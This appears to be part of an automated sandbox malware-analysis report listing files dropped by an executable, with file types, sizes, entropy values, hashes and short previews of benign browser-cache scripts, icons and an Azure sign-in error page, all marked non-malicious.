                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):671
                                                                                                                                                                                                        Entropy (8bit):5.014579690661168
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                                                                                                                        MD5:D9ED1A42342F37695571419070F8E818
                                                                                                                                                                                                        SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                                                                                                                        SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                                                                                                                        SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9310
                                                                                                                                                                                                        Entropy (8bit):7.907965931624856
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:qnmErbd5SU2ipCfR6VY9Fcygr2XecqN4zvEd4xSNzvkmglkz80bl7xcnobmP:S5bdAU3EJiHpSucq+z64xSlp40Bx8oKP
                                                                                                                                                                                                        MD5:1947B15739221EB0DB271C1DD8F95E46
                                                                                                                                                                                                        SHA1:900C22BFD81CE073DF1D2537C54429D97AA6E700
                                                                                                                                                                                                        SHA-256:FBF7FE8197902B32CE2C83F05DB73255553C716AC7B084FF1878E617963D0F51
                                                                                                                                                                                                        SHA-512:E73B17A0CCAEA85C539B5DA3BA978EBDA519D68F5686894EBEBBB529DCA54D07CA3508DBCED9D8F56D71D49469FA5916A7255B6CA455E00251D81B5E03410E5C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1391
                                                                                                                                                                                                        Entropy (8bit):4.796412914000846
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                                                                                                                        MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                                                                                                                        SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                                                                                                                        SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                                                                                                                        SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):606
                                                                                                                                                                                                        Entropy (8bit):5.268639530160161
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                                                                                                                                                        MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                                                                                                                                                        SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                                                                                                                                                        SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                                                                                                                                                        SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15678), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15678
                                                                                                                                                                                                        Entropy (8bit):5.324358729025482
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:90RU0qFPpFQ2cLJoyPKWrEysjXryLnmVyYNnL3/9BD1DdNCgTlPlMHEyM2hluZX7:90RtqppFyoyCcEys7UnpYdv9j2gRPlm8
                                                                                                                                                                                                        MD5:F420F6495D96A09B18AE9C2D2D53663C
                                                                                                                                                                                                        SHA1:89E4AEF1AE72AF0F7730B212577176003EB44BA2
                                                                                                                                                                                                        SHA-256:CB2E879CEE77E2116DA4608857CA8D66A053FADF41C72BA60C1CEE0100DE1EC4
                                                                                                                                                                                                        SHA-512:9FB9C37C154B855314D185AADC055134975E0F7A2703EA362DFC2F8DED589ABA77DC25F006CF004DD193EA68B026BC2B089EC27ADA26C81CA950A83DF0FE154C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6526), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6526
                                                                                                                                                                                                        Entropy (8bit):5.372135202911853
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:/CaRENlgVMJhPbrtwyGBdnxEd7NUCuf1bx6gqkJD:aaREXPbOLdxEd7NUnf1twI
                                                                                                                                                                                                        MD5:6904ABA1CE02BB3A01B6550C4BF98A7E
                                                                                                                                                                                                        SHA1:858127221DAF72534247D665BE661A175FAD6DD6
                                                                                                                                                                                                        SHA-256:4492B7EF7F9E30168D8F6410FF6928FCC3019618019116F82B25459B9267B038
                                                                                                                                                                                                        SHA-512:EBD259047BCDED6F925C3184A27D0D197D48B0EE3EBC2C12A27A2C9843B08C551D6DC34C299CD6E4931446F33C1D6BFF3F8CDEB018FB6C614671CF43B6497585
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                        Entropy (8bit):5.10179630103155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                                                                                                                                                        MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                                                                                                                                                        SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                                                                                                                                                        SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                                                                                                                                                        SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (371), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):371
                                                                                                                                                                                                        Entropy (8bit):4.964799787793963
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:qGD7/TMvKyYLwRMF4owANCqwvpkTzT6n0evROARDCMwzkk6Km0Msv/Gvz:JPwKVDJHCqspkZeZJDC/wKE
                                                                                                                                                                                                        MD5:B743465BB18A1BE636F4CBBBBD2C8080
                                                                                                                                                                                                        SHA1:7327BB36105925BD51B62F0297AFD0F579A0203D
                                                                                                                                                                                                        SHA-256:FEE47F1645BC40FBC0F98E05E8A53C4211F8081629FFDA2F785107C1F3F05235
                                                                                                                                                                                                        SHA-512:5592DEF225E34995F2F4E781F02CC2B489C66A7698D2FEFF9AC9A71F09E5284B6BBDB065E1DF9C06ADFB1F467D5627FBD06E647ABF4E6AB70CF34501232126AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!="undefined"&&SbiUtil.rt&&_d.querySelectorAll)for(i=SbiUtil.rt.querySelectorAll(".sbiinflnk[data-link]"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(n),i.removeAttribute(n))},t=0;t<i.length;t++){u=i[t];SbiUtil.oncop(u,r)}}var n="data-link";t()})(SbiPrivacy||(SbiPrivacy={}))
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):219
                                                                                                                                                                                                        Entropy (8bit):5.119404786158862
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGXh6BodmYWyXPBsw+SFsjRntLsMIxwCDrlT:2QBdoySw+YEOM8nlT
                                                                                                                                                                                                        MD5:33C123623267DDCCC3506DE4E71C105B
                                                                                                                                                                                                        SHA1:61C759ACDD259A7520988C3D0D58BB4C5A25D87E
                                                                                                                                                                                                        SHA-256:DDA145AF1F9D026E6C080B2D21FE7CA1CD46F4FB58DC1CAE1474C119B1E1FF2C
                                                                                                                                                                                                        SHA-512:0D0B40C625997D91D216DF9489D8D048047FC5179C264EEB77B8B1D28E5E11DFD633BE4B3AF07AFD96F9E0F526E5DD1BA97232AA6DE1B05A94FC60682321D151
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(t){n&&Lib.CssClass.contains(n,"b_active")&&(sj_pd(t),sj_sp(t))},!0)})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):282
                                                                                                                                                                                                        Entropy (8bit):4.768675821769942
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                                                                                                                        MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                                                                                                                        SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                                                                                                                        SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                                                                                                                        SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8674
                                                                                                                                                                                                        Entropy (8bit):5.212727429542033
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                                                                                                                                                        MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                                                                                                                                                        SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                                                                                                                                                        SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                                                                                                                                                        SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1111
                                                                                                                                                                                                        Entropy (8bit):4.61511796141903
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                                                                                                                        MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                                                                                                                        SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                                                                                                                        SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                                                                                                                        SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (891), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):891
                                                                                                                                                                                                        Entropy (8bit):5.1332488883366585
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                                                                                                                                                        MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                                                                                                                                                        SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                                                                                                                                                        SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                                                                                                                                                        SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1194), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1194
                                                                                                                                                                                                        Entropy (8bit):5.269399823456483
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:k+NmKUV5uE2bovcLABeU572HQ3EA+spFMC+s0+NaSrZcWZI1RuhHXI:n0VhmLABeS71F+spFL+s0+gSrZcWGuhY
                                                                                                                                                                                                        MD5:01441FB4665A4C9BA051235D2BB7DD15
                                                                                                                                                                                                        SHA1:7A543C1D7CEB0A1E42E6A5A45B13B33ABE0A580F
                                                                                                                                                                                                        SHA-256:3B27F779C252D4C874A0AF3E0A787C74DD436B45F436D38F4B2EDDF28A4F905C
                                                                                                                                                                                                        SHA-512:EEFC68BEE6521ADFC168E9FA1A3D5D89E8DBD06B336CF1983C1404201497EB72F39A80E3DB0062C29E756073780BDF5D91B339F2C750187F03C4941C0CF6E6F3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<html><head><title>Working...</title></head><body><form method="POST" name="hiddenform" action="https://www.bing.com/orgid/idtoken/nosignin"><input type="hidden" name="error" value="login_required" /><input type="hidden" name="error_description" value="AADSTS50058: A silent sign-in request was sent but no user is signed in. The cookies used to represent the user&#39;s session were not sent in the request to Azure AD. This can happen if the user is using Internet Explorer or Edge, and the web app sending the silent sign-in request is in different IE security zone than the Azure AD endpoint (login.microsoftonline.com). Trace ID: 8c3a58a4-70b8-415f-9225-88b8495e3500 Correlation ID: 90990ce5-d3d0-496a-9b06-d6029702537f Timestamp: 2025-01-03 14:26:05Z" /><input type="hidden" name="error_uri" value="https://login.microsoftonline.com/error?code=50058" /><input type="hidden" name="state" value="{&quot;ig&quot;:&quot;5F4B6DC1B0B44A0E8B9396C4B221B2F1&quot;}" /><noscript><p>Script is disabled. Cl
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):265561
                                                                                                                                                                                                        Entropy (8bit):5.432386621514022
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:Hw+voYPbYRFKstM4weHKyhqGF0/UnwQXXiR4U2JH5:HLvoMKkstM4wBVUnjJZ
                                                                                                                                                                                                        MD5:1C984AC84FC70C69942DF2AD7CD7933E
                                                                                                                                                                                                        SHA1:61A5C268E80AF49D161ADD6B6EE0DB6FC02EB6EA
                                                                                                                                                                                                        SHA-256:8D7E6CE8CC3594239246D481140C43546A2058B5B75DCA2048389C3713B9FE15
                                                                                                                                                                                                        SHA-512:1B19BC2DC7CDFD89A5657D0BDB9D9E63F6396994426780241E2F5F7669ECCFE4102814593A0E15170349F7340062D29AD8750B4B5DA43E63D624E3BA64F2FE98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):197
                                                                                                                                                                                                        Entropy (8bit):5.986656121330302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                                                                                                                                                                                        MD5:34760615AB0C180EB4B48739297FD0F2
                                                                                                                                                                                                        SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                                                                                                                                                                                        SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                                                                                                                                                                                        SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (62058), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):231602
                                                                                                                                                                                                        Entropy (8bit):5.762554862752807
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:Bl4m9Uoyafb1Hjhw3dsrWnQHdiJg7hJ5BjNnaAyGJNyWVzskeUjlWSGu9bCxKYb1:Mm9r0g9KAvyWs7Gb9+Fb1Zzae
                                                                                                                                                                                                        MD5:3ACCB914F415F2E2C36775D5783CF112
                                                                                                                                                                                                        SHA1:7CB1F2677020EAFEAF7BFCCF2E15BC7DC45DC758
                                                                                                                                                                                                        SHA-256:D3722105B5C0D92A3E85ECA10174193CD0AF84DE74586B2EEE991182CFF5AFFE
                                                                                                                                                                                                        SHA-512:3024450B40BBF7F3482F465BC831E4826543DE5D6A634584AAE7C5EA4B72D8F6E75A675D9371BF92303E051BFF94ACE431A082D8BD5E89CB664FC0DEF41DB19B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7155
                                                                                                                                                                                                        Entropy (8bit):5.435598317550486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                                                                                                                                                        MD5:DC221228E109F89B8B10C48F2678FB46
                                                                                                                                                                                                        SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                                                                                                                                                        SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                                                                                                                                                        SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 1260 x 293, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):39155
                                                                                                                                                                                                        Entropy (8bit):7.8985187905985486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:c3+SnZXFurjYW0X0RJ/Dd18i72A/qcQ6Nj2CG+CiTZ2co4IXnmDt:DSnZXFuPSX0f837cQnCG+3WZXmx
                                                                                                                                                                                                        MD5:E161E2045A32E4513E81954B1D83B953
                                                                                                                                                                                                        SHA1:0A06306203C286B8C342CFD856C1EE3F16728C7E
                                                                                                                                                                                                        SHA-256:7A344D69BC6657592E6041F0ED4F53F56ABA90B97EBD94559198B1D059DC7F64
                                                                                                                                                                                                        SHA-512:7C7E5C2D2A0DF749BB4B52F2E8042829AE8ADD4F242674E13C14FEC436E56D7B173318D8408DD5A33462D38BC1FD2AD932B2060994B5A0C46F4B4BA89922437F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1589
                                                                                                                                                                                                        Entropy (8bit):5.24528911504239
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                                                                                                                        MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                                                                                                                        SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                                                                                                                        SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                                                                                                                        SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4409
                                                                                                                                                                                                        Entropy (8bit):7.661436320849241
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                                                                                                                        MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                                                                                                                        SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                                                                                                                        SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                                                                                                                        SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 1633 x 708, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):27928
                                                                                                                                                                                                        Entropy (8bit):7.701164569435742
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xSufGKAfaoovahBv4apFM4lvzDpqFosGd+Up9FIK0B:jfUMve54E//fCiIK0B
                                                                                                                                                                                                        MD5:862D29153222B9B15C3C73B61B930335
                                                                                                                                                                                                        SHA1:391BEBF4BA8910B718C5516491EB1C7D32D4C187
                                                                                                                                                                                                        SHA-256:3EC8FA41DCE2684102F4A7B2D993388809CC2F6AE0616807CA9E3D94E6D19AC2
                                                                                                                                                                                                        SHA-512:6FFCB08DE27DFA571C8EF35E7F017F2871482581308C10CF38EFF9A507D02325222B899D667FC86227C2985ACA05F17C1CD33EF4163BE3442F70F8907BD78404
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (33353)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50932
                                                                                                                                                                                                        Entropy (8bit):5.481937509795144
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2sya0yO7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATo:9wPySjyK4FWCqbwONiqP7CAz
                                                                                                                                                                                                        MD5:3B23C7FDE0782E5C750D3FC47BF49BC3
                                                                                                                                                                                                        SHA1:7678C8847E764F85BE04A73BD29E777799195487
                                                                                                                                                                                                        SHA-256:DF22AD42AC234CAF5014C42783FCC21214E77F1750B571964BB6A3FDC3984733
                                                                                                                                                                                                        SHA-512:D0038834B7BC904D67E49DF29E5B4AE0C5BCE354EE053B2740613A909CBBA7AED338E9BB06B8BAC70281E4413EAAF96A3504565636DB225F58C0CA4CF353EA3C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1274
                                                                                                                                                                                                        Entropy (8bit):5.30620342636407
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1578), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1578
                                                                                                                                                                                                        Entropy (8bit):5.329734499973321
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1060
                                                                                                                                                                                                        Entropy (8bit):5.351152776949957
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2524), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2524
                                                                                                                                                                                                        Entropy (8bit):5.496443534651084
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19674), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19674
                                                                                                                                                                                                        Entropy (8bit):5.33240026231163
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):533
                                                                                                                                                                                                        Entropy (8bit):7.415663553371965
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):667
                                                                                                                                                                                                        Entropy (8bit):5.251512275863699
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
